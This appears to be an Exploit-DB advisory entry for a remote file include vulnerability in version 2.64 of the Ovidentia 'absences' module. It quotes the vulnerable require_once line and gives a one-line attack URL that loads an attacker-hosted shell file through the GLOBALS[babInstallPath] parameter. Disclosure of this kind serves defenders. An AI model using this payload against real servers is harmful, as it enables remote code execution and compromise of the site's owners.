Ovidentia Module absences 2.64 Remote File Include Vulnerability

vendor:

Module absences

by:

bd0rk

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: Module absences

Affected Version From: 2.64

Affected Version To: 2.64

Patch Exists: NO

Related CWE: N/A

CPE: ovidentia:module:absences

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu-Linux

Ovidentia Module absences 2.64 Remote File Include Vulnerability

The $GLOBALS['babInstallPath']-parameter isn't declared before require_once. So an attacker can use this to execute some php-shellcode for example.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.

Source

Exploit-DB raw data:

# Title: Ovidentia Module absences 2.64 Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fabsences&file=absences-2-64.zip&idf=880


Proof-of-Concept:

/absences-2-64/programs/planning.php line 26
---------------------------------------------------------------

require_once $GLOBALS['babInstallPath'].'utilit/defines.php';

---------------------------------------------------------------

[+]Sploit: http://[target]/absences-2-64/programs/planning.php?GLOBALS[babInstallPath]=YOURSHELL.txt?


Description: The $GLOBALS['babInstallPath']-parameter isn't declared before require_once.
             So an attacker can use this to execute some php-shellcode for example.


### The 27 years old, german hacker bd0rk ###